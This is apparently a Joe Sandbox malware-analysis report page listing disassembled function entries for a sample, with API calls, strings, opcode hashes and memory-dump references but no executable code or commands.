Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
String ID:
API String ID: 2012514194-0
Opcode ID: 23761eafbd111e582907dd60043c033b98d15d39c4e9d4454753bea0cc3cfbd9
Instruction ID: 20104b27aeaf911252005ed4304de03858425a7f8b67280ac4402267318061e8
Opcode Fuzzy Hash: 23761eafbd111e582907dd60043c033b98d15d39c4e9d4454753bea0cc3cfbd9
Instruction Fuzzy Hash: 1B526CB1D01218DFCB14DFA8C884BEEBBB9BF49304F258199E509AB750D774A945CF90

Function 6CF1A0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON

Download Yara Rule

APIs

CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6CF90634,6CF90738,?), ref: 6CF1A119
GetModuleHandleW.KERNEL32(mscorwks), ref: 6CF1A145
__cftoe.LIBCMT ref: 6CF1A1FB
GetModuleHandleW.KERNEL32(?), ref: 6CF1A215
GetProcAddress.KERNEL32(00000000,00000018), ref: 6CF1A265

Strings

mscorwks, xrefs: 6CF1A140
v2.0.50727, xrefs: 6CF1A110
wks, xrefs: 6CF1A10B

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: HandleModule$AddressBindProcRuntime__cftoe
String ID: mscorwks$v2.0.50727$wks
API String ID: 1312202379-2066655427
Opcode ID: 6b59734b9d19b0c09e63678e781d16c1f98240740216f656b12605019ce773af
Instruction ID: 3f7e6b1751424e65fa6c62a05af5c80c5643896b1c5522e6d6909b43a3f3323f
Opcode Fuzzy Hash: 6b59734b9d19b0c09e63678e781d16c1f98240740216f656b12605019ce773af
Instruction Fuzzy Hash: 4D916A71E092899FDB04DFE8D880A9EBBF5FF49310F20866DE119EBA40D7319909CB54

Function 6CF5DBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,A64A5C11,6CF88180,00000000,?), ref: 6CF5DBFB
GetLastError.KERNEL32 ref: 6CF5DC01
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CF5DC15
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CF5DC26
SetLastError.KERNEL32(00000000), ref: 6CF5DC2D

Part of subcall function 6CF5D9D0: GetLastError.KERNEL32(00000010,A64A5C11,7508FC30,?,00000000), ref: 6CF5DA1A

__CxxThrowException@8.LIBCMT ref: 6CF5DC78

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Strings

CryptAcquireContext, xrefs: 6CF5DC35
Crypto++ RNG, xrefs: 6CF5DC0D, 6CF5DC20

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
String ID: CryptAcquireContext$Crypto++ RNG
API String ID: 3279666080-1159690233
Opcode ID: 48d8876e7ede948c6115e51cfc9efdea62c0a10e847f300de0b606300a4bf399
Instruction ID: d6e1decacf19e10ced4b504bf7b5e22f9305845c2e6d4568d9ccafbcf7ef2957
Opcode Fuzzy Hash: 48d8876e7ede948c6115e51cfc9efdea62c0a10e847f300de0b606300a4bf399
Instruction Fuzzy Hash: AB21F671258300AFE310DB64CC45F5BBBF8EB49B44F50091EF24196AC0EBB6E4048B61

Function 6CF6948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6CF6CE6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CF6CE81
UnhandledExceptionFilter.KERNEL32(6CF89428), ref: 6CF6CE8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6CF6CEA8
TerminateProcess.KERNEL32(00000000), ref: 6CF6CEAF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1a313bfc93055d401784f657b43f7d78b6123c5dc7d8bc6fbdb026a0251b88f8
Instruction ID: ceed08a6e6e7dd6bd0b9fc97349acd9559cd91939081dda4da30d8969001fd75
Opcode Fuzzy Hash: 1a313bfc93055d401784f657b43f7d78b6123c5dc7d8bc6fbdb026a0251b88f8
Instruction Fuzzy Hash: 8521CFB5F25208DFCBD8DF95E448759BBB4FB0A304F10891AE80987B40E7B059818B15

Function 6CF62310 Relevance: 6.7, APIs: 4, Instructions: 663COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF624A1

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

std::exception::exception.LIBCMT ref: 6CF6248C

Part of subcall function 6CF69533: std::exception::_Copy_str.LIBCMT ref: 6CF6954E

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 757275642-0
Opcode ID: 009e2748ef2e01d5c0dead7ed50d4d204f9b3d436916332f338651c4f46ed6eb
Instruction ID: 0bb7959a56fb9dfc496836afd5bf7ccee83810a9e1961db7ec43e67d68d843f4
Opcode Fuzzy Hash: 009e2748ef2e01d5c0dead7ed50d4d204f9b3d436916332f338651c4f46ed6eb
Instruction Fuzzy Hash: 93329475A016058FDB04CFAAC894A9EB7B5FF89744B24411DE406DBF54EB31ED05CB90

Function 6CF55DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5a76bb33501e73fbab2f9d86d1df30a717942b7b6704716bdf81821e93ce8f
Instruction ID: 5650cd540070789386dcb062855920c2aaec9013fb967650486607043cebebaf
Opcode Fuzzy Hash: db5a76bb33501e73fbab2f9d86d1df30a717942b7b6704716bdf81821e93ce8f
Instruction Fuzzy Hash: 77028F70A28358CFC784CFAAE4A063EBFF1EBDA211F41490EE6F557251C234A559CB25

Function 6CF55EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CF562FC
_memmove.LIBCMT ref: 6CF5632B
_memmove.LIBCMT ref: 6CF5635A
_memmove.LIBCMT ref: 6CF56389

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 666a961909e6e8a217636f64a1ba6b4404f23722578485c3c13ccf735f896a29
Instruction ID: 5fd4535dd6eec00780ebfc9727203a6ba8d555f09e4210961413539ac689bece
Opcode Fuzzy Hash: 666a961909e6e8a217636f64a1ba6b4404f23722578485c3c13ccf735f896a29
Instruction Fuzzy Hash: 81E1A370928358CFC784CBAAE4A063EBFF1EBD6211F41490EE2F557291D234A16DDB25

Function 05860930 Relevance: 5.3, Strings: 4, Instructions: 336COMMON

Download Yara Rule

Strings

LOOK, xrefs: 058609B1
HERE, xrefs: 058609B6
G{q, xrefs: 05860D19
G{q, xrefs: 05860BBB

Memory Dump Source

Source File: 00000000.00000002.2025449746.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5860000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: HERE$LOOK$G{q$G{q
API String ID: 0-1799213883
Opcode ID: b906345fb6ce56ea2185de205ea74e1b9f45d368fd979e20f7c475cc45b2b378
Instruction ID: a76f86e5624655c498cb92732d25e45de3d14d99dfe165b676c522977679dcfa
Opcode Fuzzy Hash: b906345fb6ce56ea2185de205ea74e1b9f45d368fd979e20f7c475cc45b2b378
Instruction Fuzzy Hash: 48F18174E452298FDB64DF69C998B9DBBF2BB48310F1085E6D809E7351DB30AE808F54

Function 6CF5DE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(?,?,?,A64A5C11,00000000), ref: 6CF5DE6F
__CxxThrowException@8.LIBCMT ref: 6CF5DEB9

Part of subcall function 6CF5DD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6CF7F0E6,000000FF,6CF5DF67,00000000,?), ref: 6CF5DDB4

Strings

CryptGenRandom, xrefs: 6CF5DE7B

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Crypt$ContextException@8RandomReleaseThrow
String ID: CryptGenRandom
API String ID: 1047471967-3616286655
Opcode ID: eee0d8c9154d71228dc499181cf5960db410daf67bf537b35989a776a65bb4bb
Instruction ID: 87b5f0feb307666c38d16aca8658ef725f768f468be75ae773beb481087b1738
Opcode Fuzzy Hash: eee0d8c9154d71228dc499181cf5960db410daf67bf537b35989a776a65bb4bb
Instruction Fuzzy Hash: C2215671619344DFD704DF68D944B9ABBF8BB99718F008A0EF49583B80EB71E508CB92

Function 6CF563B0 Relevance: 5.1, APIs: 3, Instructions: 648COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CF56437

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 2023c6067d5ef18eab5f96fed8686f48bb643f66b43aac88f9e2aa608fe6777d
Instruction ID: c482f8be67c0b0f010161f79a0b3435eb097d613de7750c463fc3651d1d8b97d
Opcode Fuzzy Hash: 2023c6067d5ef18eab5f96fed8686f48bb643f66b43aac88f9e2aa608fe6777d
Instruction Fuzzy Hash: 9A5244706142658FD799CF29C0A052ABBF2EFCA311B54855EE4D68B38AD330F556CB90

Function 6CF5D9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,A64A5C11,7508FC30,?,00000000), ref: 6CF5DA1A

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

Strings

OS_Rng: , xrefs: 6CF5DA35
operation failed with error , xrefs: 6CF5DA49

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ErrorLastXinvalid_argumentstd::_
String ID: operation failed with error $OS_Rng:
API String ID: 406877150-700108173
Opcode ID: abaa514109ac1aff8f3279945e03c926856bc93d4b53ed81a78243efa6a77276
Instruction ID: 9c6b9ad6151633d8ce543f5a96f049e2ce9fa5259fc5d9c0746662062affff79
Opcode Fuzzy Hash: abaa514109ac1aff8f3279945e03c926856bc93d4b53ed81a78243efa6a77276
Instruction Fuzzy Hash: DB417CB1909380AFD320CF69C841B9BFBE9BF99744F10492EE18987B41DB759508CB63

Function 05100040 Relevance: 4.2, Strings: 3, Instructions: 483COMMON

Download Yara Rule

Strings

Hgq, xrefs: 05100454
$cq, xrefs: 051003B4
$cq, xrefs: 051003A8

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID: Hgq$$cq$$cq
API String ID: 0-2948965698
Opcode ID: 093b46f65b98fb79239565e0afd9d93c21c79b8c59e2d91c30379dcdd63b98d7
Instruction ID: 31261c8670f725548728075b7036d0e88421a8d42c75864433c694d1d54a7d6c
Opcode Fuzzy Hash: 093b46f65b98fb79239565e0afd9d93c21c79b8c59e2d91c30379dcdd63b98d7
Instruction Fuzzy Hash: 5D026070F041198FCB19DFA9C8986BEBBB2BF8C300F559469D406EB395DB749C028B95

Function 6CF61CA0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CF61E1D

Part of subcall function 6CF69533: std::exception::_Copy_str.LIBCMT ref: 6CF6954E

__CxxThrowException@8.LIBCMT ref: 6CF61E32

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 757275642-0
Opcode ID: 2955177e3c5d5580042c43c99bc308902f6557e972a50ffe008da46534ae2f74
Instruction ID: 123500ab360821dd96fd90748f419dc7728312d3db2d44f5bda1c2e027e9c014
Opcode Fuzzy Hash: 2955177e3c5d5580042c43c99bc308902f6557e972a50ffe008da46534ae2f74
Instruction Fuzzy Hash: 7C32A275A016059FDB08CF9AC894AAEB3B6FF89744B24811DE516DBF50EB31ED04CB90

Function 6CF70B89 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8bd167dd75f0307e3a6416aab7f1daf52203615fdc148968dc0b6412d113949
Instruction ID: 3c09c97dab638eaaef2c98af120e6d3e456df8d090d73dca20b6dc945c09ec0c
Opcode Fuzzy Hash: e8bd167dd75f0307e3a6416aab7f1daf52203615fdc148968dc0b6412d113949
Instruction Fuzzy Hash: 3A32F522E2AF414DDB639634D832336726DAFB73D8F25D727E819B5D95EB29C4834100

Function 6CF5DEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF04760: __CxxThrowException@8.LIBCMT ref: 6CF047F9

CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6CF5DF7B

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ContextCryptException@8ReleaseThrow
String ID:
API String ID: 3140249258-0
Opcode ID: 8a423167df56adde20faba1145d899df271d52911b9ff3671aef292abb63004e
Instruction ID: 118fcd04da2ca5ab1be3c18121fc0b0ea00680344010fe11785a8b810c29929b
Opcode Fuzzy Hash: 8a423167df56adde20faba1145d899df271d52911b9ff3671aef292abb63004e
Instruction Fuzzy Hash: 5E21B0B5909340ABC740DF14D940B4BBBE8EBAA768F440A1DF84583781D771E508CBE2

Function 6CF5DD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6CF7F0E6,000000FF,6CF5DF67,00000000,?), ref: 6CF5DDB4

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

